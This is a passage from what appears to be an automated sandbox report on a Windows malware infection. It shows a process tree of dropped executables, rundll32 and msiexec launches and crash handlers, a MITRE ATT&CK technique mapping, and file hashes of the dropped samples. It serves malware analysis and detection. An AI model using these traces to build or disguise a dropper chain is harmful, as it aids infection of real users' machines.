                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                              PID:5580
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5760 -ip 5760
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:6024
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4828 -ip 4828
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:4164
                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 380 -p 6004 -ip 6004
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:3680
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4928 -ip 4928
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:2424
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5268 -ip 5268
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6820
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-M61H4.tmp\setup_2.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-M61H4.tmp\setup_2.tmp" /SL5="$50266,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                            PID:6800
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ROS2P.tmp\postback.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ROS2P.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5884
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5992 -ip 5992
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                              PID:3504
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6980 -ip 6980
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                              PID:1152
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5776 -ip 5776
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                              PID:5520
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 3824 -ip 3824
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                              PID:3792
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 832 -ip 832
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:3856
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4892 -ip 4892
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                PID:4516
                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                PID:6876
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5488
                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                  PID:6364
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 460
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                      PID:5200
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5440 -ip 5440
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4884
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3C24.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3C24.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:3428
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3C24.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3C24.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:6564
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 4656 -ip 4656
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                    PID:2700
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4EA4.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4EA4.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:2740
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4EA4.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4EA4.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7305.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7305.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:4416
                                                                                                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5384
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6360 -ip 6360
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                        PID:7152
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DFF9.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DFF9.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4584
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 256
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                            PID:3000
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ECBB.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ECBB.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                          PID:6752
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:920
                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 6752 -s 1684
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                              PID:6660
                                                                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:3200
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding CDAFA3F17BCEE5E993850F3E9D9A0090 C
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:1188
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding AA4277DAAE80C8B58078A8ABF8E868B2
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                              PID:5448
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:5672
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 3A6AF5C28E0D5C4484E1C5DE625390C5 E Global\MSI0000
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              PID:4376
                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            PID:6884
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:2944
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 452
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                PID:6352
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4584 -ip 4584
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                            PID:4244
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2944 -ip 2944
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1456
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6388 -ip 6388
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:1068
                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 508 -p 6752 -ip 6752
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              PID:6908
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A28.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A28.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                              PID:6892
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\138F.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\138F.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:3784
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 284
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                    PID:4356
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\19E9.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\19E9.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                  PID:1456
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 256
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                    PID:2508
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3784 -ip 3784
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                  PID:3332
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1456 -ip 1456
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                  PID:3204
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  PID:4704

                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  78709ec579b3389b803133efefab5136

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d4fee1a7e0b057b227c1992187c823dafc5d3fed

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  dea0f84142dbd4a875e8ba6bc7cdfc9b40f7d604dd5c5fdb05f3f270064f58cb

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d6112510bdb6b32d536d1fb4dddcdf4c2b4713dedd2a2e9e77e324a61ec8904dbf21b5165642652a3e149df0cf75cc1df3c514c87221542ffd3b35dbfa230c9a

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  78709ec579b3389b803133efefab5136

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  d4fee1a7e0b057b227c1992187c823dafc5d3fed

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  dea0f84142dbd4a875e8ba6bc7cdfc9b40f7d604dd5c5fdb05f3f270064f58cb

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d6112510bdb6b32d536d1fb4dddcdf4c2b4713dedd2a2e9e77e324a61ec8904dbf21b5165642652a3e149df0cf75cc1df3c514c87221542ffd3b35dbfa230c9a

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  b39390c4c99cb81fceb07a8fc50c0ed8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  5c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  6e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  9112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  b39390c4c99cb81fceb07a8fc50c0ed8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  5c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  6e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  9112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  b39390c4c99cb81fceb07a8fc50c0ed8

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  5c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  6e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  9112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061927332abbf6f4e.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  82ef840eb306d59588fe580293d02d98

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  e8d8daf7329437c0da02cd58a2c590e08a39f4fb

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b5b2c802acac154a31c2ad67b0d97fd481db8887a939173b54ec2a933792daa9

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  84a8a52612f05918ddae762f9a85b8b5f3bb9fb75068721cdd4d64e7f180cce3c62fedb8460662bdaaa88190e7928082b3935d4500799c7a0cfaf6b31b6f26a5

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061927332abbf6f4e.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  82ef840eb306d59588fe580293d02d98

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  e8d8daf7329437c0da02cd58a2c590e08a39f4fb

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b5b2c802acac154a31c2ad67b0d97fd481db8887a939173b54ec2a933792daa9

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  84a8a52612f05918ddae762f9a85b8b5f3bb9fb75068721cdd4d64e7f180cce3c62fedb8460662bdaaa88190e7928082b3935d4500799c7a0cfaf6b31b6f26a5

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061fcef41b576c18.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  54d6502986e307baad2f6897e11db3f1

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  17fd3b1ae744d95de0a2c61fef82976af11eed8a

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  93a17aa366e45b5d4c87a6273cd20a6657a729516831f486ca9478dffd44f83b

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  57d59f134c5a7c65df6e19aed99e4ff4329cfe112efdbf91cda7ad045fee39fd4631dd16bc780f78ba17a524f2a0d7a0e4b3d907d5054c0978920b432203238e

                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061fcef41b576c18.exe
                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  54d6502986e307baad2f6897e11db3f1

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  17fd3b1ae744d95de0a2c61fef82976af11eed8a

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  93a17aa366e45b5d4c87a6273cd20a6657a729516831f486ca9478dffd44f83b

                                                                                                                                                                                                                                                                                  SHA512

